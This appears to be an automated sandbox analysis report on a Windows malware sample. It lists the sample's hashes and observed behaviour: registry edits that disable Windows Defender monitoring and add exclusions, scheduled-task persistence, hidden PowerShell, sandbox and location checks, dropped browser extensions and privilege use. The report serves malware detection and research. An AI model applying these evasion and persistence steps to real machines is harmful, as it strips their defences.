Analysis
-
max time kernel
129s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
11/07/2024, 22:40
Static task
static1
Behavioral task
behavioral1
Sample
c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe
Resource
win7-20240704-en
General
-
Target
c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe
-
Size
7.3MB
-
MD5
8e83a0d33c080fb12dd1e8b84dc2a5f9
-
SHA1
3ed612adc379f6e0529dcb8eef015ccd5da06faf
-
SHA256
c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff
-
SHA512
07fa4d2702491093c8efbfd52c9f4e795f31dcf7e4b87d98e21ebb90dbeddab7a9d494d5804e2c72fb280fa57da556d0ad9a718677cf15eae275758204714247
-
SSDEEP
196608:91OTVZAnLjvxhU/KExKDQcqmhOcdEVfLqmYR7+mw4uPbjl:3OTPCBh2KhQPMOcdc+mC7+mluPbjl
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GtOnFDWCCgUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\itCXZnYssICbfHKCXDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\XKbpoCnULTQzsVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZPMEzngU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZPMEzngU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WIjQsZOhtuiKSoXd = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WIjQsZOhtuiKSoXd = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WIjQsZOhtuiKSoXd = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GtOnFDWCCgUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LAYqAmppRtojC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LAYqAmppRtojC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\itCXZnYssICbfHKCXDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KDENuaOqQISU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\XKbpoCnULTQzsVVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KDENuaOqQISU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WIjQsZOhtuiKSoXd = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 2044 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1568 powershell.EXE 1316 powershell.exe 2128 powershell.exe 2688 powershell.exe 292 powershell.EXE 1748 powershell.EXE 2496 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\International\Geo\Nation ffeQVgT.exe -
Executes dropped EXE 4 IoCs
pid Process 3044 Install.exe 2764 Install.exe 324 adRNGBp.exe 1564 ffeQVgT.exe -
Loads dropped DLL 23 IoCs
pid Process 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 3044 Install.exe 3044 Install.exe 3044 Install.exe 3044 Install.exe 2764 Install.exe 2764 Install.exe 2764 Install.exe 2664 WerFault.exe 2664 WerFault.exe 2664 WerFault.exe 2044 rundll32.exe 2044 rundll32.exe 2044 rundll32.exe 2044 rundll32.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2220 WerFault.exe 2220 WerFault.exe 2220 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ffeQVgT.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ffeQVgT.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 ffeQVgT.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol adRNGBp.exe File created C:\Windows\system32\GroupPolicy\gpt.ini adRNGBp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 ffeQVgT.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol adRNGBp.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini adRNGBp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ffeQVgT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 ffeQVgT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ffeQVgT.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ffeQVgT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ffeQVgT.exe File created C:\Program Files (x86)\KDENuaOqQISU2\SKBliUZDHVFjP.dll ffeQVgT.exe File created C:\Program Files (x86)\KDENuaOqQISU2\lhRUvgV.xml ffeQVgT.exe File created C:\Program Files (x86)\LAYqAmppRtojC\pqOgkxR.xml ffeQVgT.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ffeQVgT.exe File created C:\Program Files (x86)\rZPMEzngU\AbwIxGZ.xml ffeQVgT.exe File created C:\Program Files (x86)\itCXZnYssICbfHKCXDR\CNKbPLX.xml ffeQVgT.exe File created C:\Program Files (x86)\LAYqAmppRtojC\zLFVAoY.dll ffeQVgT.exe File created C:\Program Files (x86)\rZPMEzngU\KlUDVj.dll ffeQVgT.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ffeQVgT.exe File created C:\Program Files (x86)\itCXZnYssICbfHKCXDR\JBltyKv.dll ffeQVgT.exe File created C:\Program Files (x86)\GtOnFDWCCgUn\OnFWLBj.dll ffeQVgT.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bMfeDuSmKBAGoOfQBS.job schtasks.exe File created C:\Windows\Tasks\NEaCSBqXysBCPlvqA.job schtasks.exe File created C:\Windows\Tasks\ddAsdXfMPNFuAfl.job schtasks.exe File created C:\Windows\Tasks\EzpqHUsZzUnFxcQTT.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2664 324 WerFault.exe 41 2148 2764 WerFault.exe 31 2220 1564 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs ffeQVgT.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" adRNGBp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b1b27ee3d3da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-31-6d-f9-a3-60 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-31-6d-f9-a3-60\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ffeQVgT.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-31-6d-f9-a3-60\WpadDecision = "0" ffeQVgT.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-31-6d-f9-a3-60\WpadDecisionTime = 606a4b9ce3d3da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a082987ee3d3da01 adRNGBp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ffeQVgT.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached adRNGBp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ffeQVgT.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ adRNGBp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-31-6d-f9-a3-60\WpadDecisionReason = "1" ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ffeQVgT.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadNetworkName = "Network 3" ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs ffeQVgT.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ffeQVgT.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadNetworkName = "Network 3" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadDecisionReason = "1" ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadDecisionTime = a02f8a94e3d3da01 ffeQVgT.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\WpadDecision = "0" ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60}\8e-31-6d-f9-a3-60 ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" adRNGBp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ffeQVgT.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A25466CA-BF17-475A-B3CD-B1562D5BAF60} ffeQVgT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My ffeQVgT.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2432 schtasks.exe 3060 schtasks.exe 344 schtasks.exe 2448 schtasks.exe 1048 schtasks.exe 2772 schtasks.exe 1528 schtasks.exe 1880 schtasks.exe 972 schtasks.exe 2484 schtasks.exe 332 schtasks.exe 2664 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2688 powershell.exe 292 powershell.EXE 292 powershell.EXE 292 powershell.EXE 1748 powershell.EXE 1748 powershell.EXE 1748 powershell.EXE 2496 powershell.exe 1568 powershell.EXE 1568 powershell.EXE 1568 powershell.EXE 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1316 powershell.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 2128 powershell.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe 1564 ffeQVgT.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe Token: SeIncreaseQuotaPrivilege 2684 WMIC.exe Token: SeSecurityPrivilege 2684 WMIC.exe Token: SeTakeOwnershipPrivilege 2684 WMIC.exe Token: SeLoadDriverPrivilege 2684 WMIC.exe Token: SeSystemProfilePrivilege 2684 WMIC.exe Token: SeSystemtimePrivilege 2684 WMIC.exe Token: SeProfSingleProcessPrivilege 2684 WMIC.exe Token: SeIncBasePriorityPrivilege 2684 WMIC.exe Token: SeCreatePagefilePrivilege 2684 WMIC.exe Token: SeBackupPrivilege 2684 WMIC.exe Token: SeRestorePrivilege 2684 WMIC.exe Token: SeShutdownPrivilege 2684 WMIC.exe Token: SeDebugPrivilege 2684 WMIC.exe Token: SeSystemEnvironmentPrivilege 2684 WMIC.exe Token: SeRemoteShutdownPrivilege 2684 WMIC.exe Token: SeUndockPrivilege 2684 WMIC.exe Token: SeManageVolumePrivilege 2684 WMIC.exe Token: 33 2684 WMIC.exe Token: 34 2684 WMIC.exe Token: 35 2684 WMIC.exe Token: SeDebugPrivilege 292 powershell.EXE Token: SeDebugPrivilege 1748 powershell.EXE Token: SeDebugPrivilege 2496 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2076 WMIC.exe Token: SeIncreaseQuotaPrivilege 2076 WMIC.exe Token: SeSecurityPrivilege 2076 WMIC.exe Token: SeTakeOwnershipPrivilege 2076 WMIC.exe Token: SeLoadDriverPrivilege 2076 WMIC.exe Token: SeSystemtimePrivilege 2076 WMIC.exe Token: SeBackupPrivilege 2076 WMIC.exe Token: SeRestorePrivilege 2076 WMIC.exe 